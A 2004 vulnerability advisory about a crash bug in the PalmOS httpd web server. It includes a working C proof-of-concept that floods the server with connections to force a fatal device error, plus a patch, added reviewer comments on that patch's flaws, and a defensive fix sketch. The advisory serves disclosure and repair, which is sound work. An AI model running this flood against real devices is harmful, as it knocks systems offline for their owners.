
PalmOShttpd.txt
Posted Feb 9, 2004
Authored by Shaun Colley

A bug exists in the PalmOS httpd that causes a crash with a "Fatal Error". Full exploit included.

tags | exploit
systems | palmos
SHA-256 | 5b285308b063e2d59eb136e0072c9ab4a49538d664eb748f4491f7dabcadc37a

Introduction
#############

'httpd' for PalmOS was originally written by Jim Rees,
and is a simple webserver for Palm powered PDAs.
Since the development of httpd for Palm stopped, I
decided to modify 'httpd' slightly, and re-release it
on freshmeat.net.
However, httpd contains a bug which causes the device
to crash due to a "Fatal Error". The slightly
modified version of 'httpd' (called palmhttpd)
contains the same bug as the original, as I used Jim's
code.


The bug
########

The bug allows an attacker to crash the entire device,
causing a "Fatal Error", rendering the device unusable
until it is reset completely. PalmOS can only handle
1 client connection, but 'httpd' implements a while(1)
loop to accept() connections forever. Because of
this, httpd will accept more than 1 connection, which
PalmOS literally CANNOT do. The result is a dialog
box saying "Fatal Error, NetStack1.c overflowed
accept queue", with a "Reset" button.

Below is the offending code:

---from httpd.c

[snip]
    while (1) {    /* Cause of the bug is here!
                      PalmOS can only accept 1 client connection! */
        if (f) {
            xclose(f);
            f = NULL;
        }
        if (fd >= 0) {
            close(fd);
            fd = -1;
        }

        /* Accept connections */
        len = sizeof saddr;
        AppNetTimeout = SysTicksPerSecond() * 1;
        if ((fd = accept(sfd, (struct sockaddr *)&saddr, &len)) < 0) {
[snip]
---

Exploiting this DoS vulnerability will crash PalmOS
INDEFINITELY.



The exploit
############

Here is a PoC exploit for the issue:


---palmslam.c
/* PalmOS httpd accept queue overflow PoC exploit.
 * Compile: gcc palmslam.c -o palmslam
 *
 * -shaun2k2
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025

int main(int argc, char *argv[]) {
    int sock[MAX_CON];
    int i;
    struct sockaddr_in dest[MAX_CON];
    struct hostent *host;

    if(argc < 3) {
        printf("Usage: palmslam <host> <port>\n");
        exit(-1);
    }

    /* gethostbyname() returns a pointer, so failure is NULL, not -1 */
    if((host = gethostbyname(argv[1])) == NULL) {
        printf("Couldn't resolve %s!\n", argv[1]);
        exit(-1);
    }

    /* i < MAX_CON: the original "<=" stepped one past the end of sock[] */
    for(i = 0; i < MAX_CON; i++) {
        if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            printf("Couldn't create socket!\n");
            exit(-1);
        }

        dest[i].sin_family = AF_INET;
        dest[i].sin_port = htons(atoi(argv[2]));
        dest[i].sin_addr = *((struct in_addr *)host->h_addr);

        if(connect(sock[i], (struct sockaddr *)&dest[i], sizeof(struct sockaddr)) == -1) {
            printf("Couldn't connect to %s on port %s!\n", argv[1], argv[2]);
            exit(-1);
        }

        printf("%d : Connected!\n", i);
    }
    return(0);
}
---

I connected my Sony CLIE to the net via a simple pppd
script, ran palmhttpd, and ran the PoC exploit against
it:

---
[root@localhost DoS]# ./palmslam 6X.XX.68.XX 80
0 : Connected!
1 : Connected!
2 : Connected!
---


At this point, my CLIE's screen presented me with the
dialog box.


+---------------------------------------+
|              Fatal Error              |
|---------------------------------------|
|                                       |
|  Fatal Alert NetStack1.c, Line 4XXX,  |
|  overflowed accept queue              |
|                                       |
|          +-----------------+          |
|          |      Reset      |          |
|          +-----------------+          |
|                                       |
+---------------------------------------+



The fix
########

I have written a simple patch to fix the issue:

---httpd.patch
--- httpd.c 2004-01-14 17:21:41.000000000 +0000
+++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
@@ -391,8 +391,15 @@
NetLibAddrINToA(AppNetRefnum,
ifinfo.param.interfaceInfo.ipAddr, host);
printf("Listening on %s\n", host);

- while (1) {
- if (f) {
+ /* Here is where the bug manifests: PalmOS can
only take 1 client
+ * connection (according to even the PalmOS
programming documentation),
+ * but this loop accept()s connections forever.
The loop is now commented
+ * out, fixing the bug.
+ * -Shaun2k2
+ */
+
+ /*while (1) {*/
+ if (f) {
xclose(f);
f = NULL;
}
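Review bot: Commenting out `while (1) {` means the accept/serve body runs exactly once, so the fix trades a device crash for a server that has to be relaunched after every client; keeping the loop and instead bounding what the stack will queue (a `listen()` backlog of 1, with the previous client fully closed before the next `accept()`, as the body already does) would keep the service up. Separately, the added comment lines `only take 1 client`, `programming documentation),` and `The loop is now commented` carry no leading `+`, so `patch` will reject this hunk exactly as shown; re-wrap the comment so every added line starts with `+`.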
@@ -507,7 +514,7 @@
}

printf("stopped\n");
-}
+/*}*/

char html0[] = "HTTP/1.0 200 OK\nMIME-version:
1.0\nContent-type: %s\n\n";
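Review bot: `/*}*/` is the closing brace of the loop commented out in the first hunk, so the two hunks only make sense together; if the first hunk is rejected (see its wrapped comment lines), applying this one alone leaves the function with an unbalanced brace. The context line `char html0[] = "HTTP/1.0 200 OK\nMIME-version:` is also split across two lines, another sign the patch text has been re-wrapped in transit and should be regenerated with `diff -u` before anyone tries to apply it.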
---

Apply the patch: patch httpd.c httpd.patch

Type 'make' to recompile httpd. Although I haven't
tested the patch, I assume it works. Let me know if
it does not.

I will be uploading a patched version of palmhttpd to
freshmeat.net.
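As an added example that is not part of this advisory or of Jim Rees's httpd, the following POSIX C sketch shows the shape of fix a reviewer would ask for instead of deleting the loop: keep accepting forever, but give `listen()` a backlog of 1 and fully close each client before the next `accept()`, so the server side never holds more than one connection and stays up after the first request. It assumes BSD sockets on a normal OS rather than the PalmOS NetLib API, so it is a model of the fix, not a drop-in patch; `BACKLOG`, `make_listener` and `serve_one` are names chosen here.

```c
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BACKLOG 1   /* assumption: queue depth a one-connection stack tolerates */
static const char REPLY[] = "HTTP/1.0 200 OK\r\nContent-Length: 0\r\n\r\n";

/* Bind 127.0.0.1:port (0 = ephemeral) and listen with BACKLOG.
 * Returns the listening fd, or -1 on error. */
int make_listener(unsigned short port)
{
    struct sockaddr_in sa;
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0)
        return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) < 0 ||
        listen(lfd, BACKLOG) < 0) {
        close(lfd);
        return -1;
    }
    return lfd;
}

/* Accept one client, drain its request, answer it and close it before
 * returning.  A caller may loop on this forever: the previous client is
 * always closed before the next accept().  Returns bytes written or -1. */
int serve_one(int lfd)
{
    struct sockaddr_in peer;
    socklen_t len = sizeof peer;
    char buf[512];
    int cfd = accept(lfd, (struct sockaddr *)&peer, &len);
    if (cfd < 0)
        return -1;
    if (read(cfd, buf, sizeof buf) < 0) {    /* drain whatever was sent */
        close(cfd);
        return -1;
    }
    ssize_t n = write(cfd, REPLY, sizeof REPLY - 1);
    close(cfd);                              /* closed before next accept */
    return n < 0 ? -1 : (int)n;
}
```

A server built on this would call `serve_one(lfd)` in its `while (1)` loop and keep running; on a stack that fatals when its accept queue overflows, the backlog of 1 is the only knob the application has over what the kernel queues.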


Credit
#######

This vulnerability was discovered by shaun2k2 / Shaun
Colley.



Thank you for your time.
Shaun.







